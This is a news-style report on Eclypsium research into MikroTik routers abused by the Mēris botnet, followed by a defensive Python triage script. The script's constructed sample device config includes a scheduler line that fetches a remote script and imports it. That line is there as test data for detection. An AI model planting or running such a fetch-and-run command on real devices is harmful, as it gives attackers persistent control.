The routers used by the Mēris botnet in a massive distributed denial-of-service (DDoS) attack against Russia’s internet giant Yandex have also been the unwitting platform for numerous cyber-attacks, researchers discovered.
This is due to a persistent vulnerable state that is difficult for organisations to deal with, but easy for threat actors to exploit, they explained.
Latvia
Researchers from Eclypsium took a deep look into the small office/home office (SOHO) & internet-of-things (IoT) devices from Latvia-based company MikroTik, of which some 2m are deployed.
Due to the number of devices in use, their processing power & the numerous known vulnerabilities within them, threat actors have been using MikroTik devices for years as infrastructure from which to launch numerous attacks, researchers stated.
MikroTik Attack Surface
Eclypsium researchers began exploring the how & why of the weaponization of MikroTik devices in Sept., based on previous research into how TrickBot threat actors used compromised routers as command-&-control (C2) infrastructure. Eclypsium analysts found that TrickBot was also able to fall back on MikroTik infrastructure after US Cyber Command successfully disrupted its main infrastructure.
“This made us want to better understand the MikroTik attack surface & how attackers might use them once compromised,” they wrote.
In addition to their power, one of the main reasons MikroTik devices are so popular with attackers is that they are, like many SOHO & IoT devices, ‘vulnerable out of the box.’
Default Credentials
They often ship with default credentials of admin & an empty password, & even devices intended for corporate environments come without a default configuration for the WAN port, researchers wrote.
Additionally, MikroTik devices often miss out on important firmware patches because their auto-upgrade feature is rarely turned on, “meaning that many devices are simply never updated,” according to Eclypsium.
2018 & 2019
This has allowed CVEs dating back to 2018 & 2019, 1 of which was used in the Yandex attack, to remain unpatched on many devices & ripe for exploitation, researchers suggested. The bugs tracked as CVE-2019-3977, CVE-2019-3978, CVE-2018-14847 & CVE-2018-7445 can all be reached remotely without authentication & lead to remote code execution (RCE) or a complete takeover of a device.
MikroTik devices also have “an incredibly complex configuration interface” that invites mistakes from those setting them up, leaving devices easy for attackers to discover & abuse over the internet, researchers outlined.
Multiple Cyberattack Situations
“The capabilities demonstrated in these attacks should be a red flag for enterprise security teams,” researchers wrote in a report published Thurs. “The ability for compromised routers to inject malicious content, tunnel, copy or reroute traffic can be used in a variety of highly damaging ways.”
These include the use of DNS ‘poisoning’ to redirect a remote worker’s connection to a malicious website or introduce a machine-in-the-middle attack; the use of well-known techniques & tools to potentially capture sensitive information or steal 2-factor authentication (2FA) credentials; the tunnelling of enterprise traffic to another location; or the injection of malicious content into valid traffic, researchers observed.
Botnet Attack
Then there was the Mēris botnet attack, which happened soon after Eclypsium began its research. Requests in the HTTP-pipelining DDoS attack on Russia’s internet giant Yandex in Sept. originated from MikroTik networking gear, with attackers exploiting a 2018 bug that remained unpatched on the more than 56,000 MikroTik hosts involved in the incident.
Eclypsium also found around 20,000 devices with proxies open, which were injecting different crypto-mining scripts into web pages.
“These devices are both powerful, & as our research shows, often highly vulnerable,” they noted, adding that MikroTik devices, in addition to serving SOHO environments, are regularly used by local Wi-Fi networks, which also attracts attention from attackers.
Tool to Mitigate Risk
Researchers used Shodan queries to build a dataset of 300,000 IP addresses vulnerable to at least 1 of the mentioned RCE exploits, & also tracked geographically where the devices were located, finding that they are “particularly widespread,” they wrote.
Researchers found that China, Brazil, Russia, Italy & Indonesia had the most total vulnerable devices, with the US coming in at 8 on the list.
Network Administrators
Eclypsium has created a freely available tool that could allow network administrators to test their devices’ vulnerability, in 3 ways: Identify MikroTik devices with CVEs that would allow the device to be taken over; attempt to log in with a given list of default credentials; & check for indicators of compromise of the Mēris botnet.
The tool works across the SSH, WinBox & HTTP API protocols, all of which the Mēris malware uses, researchers said. Eclypsium recommended that enterprises using the tool only attempt to log into MikroTik devices that they own & accept liability for their actions.
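The same kind of triage can be done offline against text captured from a device you own. The script below is an added example, not Eclypsium's checker & not MikroTik code: it reads the output of `/system resource print` & `/export`, flags which of the four CVEs above the running version predates, lists management services left enabled on any address (the default-credential & unpatched-firmware problems described earlier), reports whether a `/system package update` job is scheduled, & flags scheduler entries that fetch & import a remote script. The fixed-in versions are assumptions from memory of the vendor changelogs & should be confirmed against MikroTik's release notes; the factory-default service list is likewise an assumption for RouterOS 6; the remote-fetch check is a generic heuristic, not the Mēris indicator list. A default-credential test needs a live login attempt & is deliberately left out. The sample device output is constructed.

```python
"""Offline triage of a MikroTik RouterOS device from captured CLI text.

Added example, not Eclypsium's tool & not MikroTik code. Inputs are the text
of '/system resource print' & '/export' from a device you own.
"""
import re

# ASSUMED fixed-in versions (stable branch), from memory of vendor changelogs;
# confirm against MikroTik release notes before relying on them.
CVE_FIXED_IN = {
    "CVE-2018-7445": (6, 41, 3),   # SMB service buffer overflow
    "CVE-2018-14847": (6, 42, 1),  # Winbox directory traversal, leaks credentials
    "CVE-2019-3977": (6, 45, 7),   # upgrade package origin not validated
    "CVE-2019-3978": (6, 45, 7),   # DNS cache poisoning
}
# ASSUMED RouterOS 6 factory defaults: enabled on any address / disabled.
DEFAULT_ENABLED = {"telnet", "ftp", "www", "ssh", "winbox", "api"}
DEFAULT_DISABLED = {"www-ssl", "api-ssl"}
KV = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')  # key=value or key="..."

def parse_version(resource_print):
    """(major, minor, patch) from the 'version:' line; rc/beta suffixes ignored."""
    m = re.search(r"version:\s*(\d+)\.(\d+)(?:\.(\d+))?", resource_print)
    if not m:
        raise ValueError("no 'version:' line in /system resource print output")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def unpatched_cves(version):
    """CVEs whose fix version is newer than the running version."""
    return sorted(cve for cve, fixed in CVE_FIXED_IN.items() if version < fixed)

def parse_export(export):
    """Group '/export' lines by section header, joining '\\'-continued lines."""
    sections, current, buf = {}, None, ""
    for raw in export.splitlines():
        line = buf + raw.strip()
        buf = ""
        if line.endswith("\\"):          # RouterOS wraps long lines with '\'
            buf = line[:-1] + " "
            continue
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):         # e.g. '/ip service', '/system scheduler'
            current = line
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

def kv(line):
    """key=value pairs of one export line, quotes stripped."""
    return {k: v.strip('"') for k, v in KV.findall(line)}

def exposed_services(sections):
    """Enabled management services not restricted with address=."""
    state = {s: {"disabled": "no", "address": ""} for s in DEFAULT_ENABLED}
    state.update({s: {"disabled": "yes", "address": ""} for s in DEFAULT_DISABLED})
    for line in sections.get("/ip service", []):   # lines like 'set winbox address=...'
        parts = line.split(None, 2)
        if len(parts) >= 2 and parts[0] == "set" and parts[1] in state:
            state[parts[1]].update(kv(line))
    return sorted(s for s, st in state.items()
                  if st["disabled"] == "no" and not st["address"])

def auto_upgrade_scheduled(sections):
    """True if some scheduler entry runs '/system package update'."""
    return any("package update" in kv(line).get("on-event", "")
               for line in sections.get("/system scheduler", []))

def remote_fetch_schedulers(sections):
    """Scheduler entries whose on-event fetches a remote URL (review by hand).
    Generic heuristic, not the Mēris indicator list."""
    hits = []
    for line in sections.get("/system scheduler", []):
        event = kv(line).get("on-event", "")
        if "fetch" in event and re.search(r"(?:https?|ftp)://", event):
            hits.append(kv(line).get("name", "?"))
    return hits

def triage(resource_print, export):
    sections = parse_export(export)
    version = parse_version(resource_print)
    return {"version": version,
            "unpatched_cves": unpatched_cves(version),
            "exposed_services": exposed_services(sections),
            "auto_upgrade": auto_upgrade_scheduled(sections),
            "suspicious_schedulers": remote_fetch_schedulers(sections)}

# Constructed sample output, not captured from a real device.
SAMPLE_RESOURCE = """\
                   uptime: 3w2d4h11m
                  version: 6.42.3 (stable)
               build-time: May/24/2018 09:26:11
"""
SAMPLE_EXPORT = """\
# may/24/2018 10:00:00 by RouterOS 6.42.3
/ip service
set telnet disabled=yes
set ftp disabled=yes
set winbox address=192.168.88.0/24
/system scheduler
add name=schd interval=10m start-time=startup \\
    on-event="/tool fetch url=http://198.51.100.7/p.rsc dst-path=p.rsc; /import p.rsc"
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_RESOURCE, SAMPLE_EXPORT).items():
        print(f"{key}: {value}")
```

Run as-is, it reports the sample device as patched against the two 2018 bugs but not the 2019 ones, with `www`, `ssh` & `api` still reachable from any address, no upgrade job scheduled, & one scheduler entry pulling a script from a remote host. Replace the two sample strings with output from your own device; a version comparison is only a first pass, since hotfix & long-term branches carry their own fix numbers.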